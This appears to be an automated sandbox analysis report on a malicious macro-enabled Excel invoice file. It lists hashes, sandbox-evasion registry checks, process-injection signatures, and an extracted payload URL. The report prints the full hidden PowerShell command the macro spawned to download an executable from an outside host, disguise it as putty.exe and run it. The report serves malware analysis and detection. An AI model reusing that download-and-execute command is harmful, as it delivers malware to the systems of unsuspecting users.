Analysis
-
max time kernel
137s -
max time network
146s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
11-07-2020 06:07
Static task
static1
Behavioral task
behavioral1
Sample
INV100720.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
INV100720.xlsm
Resource
win10v200430
General
-
Target
INV100720.xlsm
-
Size
399KB
-
MD5
97d1bf3b13839cb70157bbebc2ab1f8c
-
SHA1
b12d4e4b14d3b443e1abb9b6a5a9b6b74de2686a
-
SHA256
9a63be97d600c50abdddc22afd998e25ddac5030bcc4846b97cf7e1932eae7b8
-
SHA512
1bf7e0619db7bbf6bdf4a67608f5d74144ee114c769554e15af72bbd027d792f0e68cf36ea4839b6d37bafab14f73a240ef9d5381f83726a147e51a62e533bb0
Malware Config
Extracted
http://comawhimplet.com/nccd.exe
Signatures
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE 2536 EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2536 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3952 2536 powershell.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
EXCEL.EXEdescription pid process target process PID 2536 wrote to memory of 3952 2536 EXCEL.EXE powershell.exe PID 2536 wrote to memory of 3952 2536 EXCEL.EXE powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3952 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3952 powershell.exe 3952 powershell.exe 3952 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 16 3952 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\INV100720.xlsm"1⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://comawhimplet.com/nccd.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2536-4-0x000002030D3D4000-0x000002030D3DA000-memory.dmpFilesize
24KB
-
memory/2536-5-0x000002030D3D4000-0x000002030D3DA000-memory.dmpFilesize
24KB
-
memory/2536-6-0x000002030D3D4000-0x000002030D3DA000-memory.dmpFilesize
24KB
-
memory/3952-7-0x0000000000000000-mapping.dmp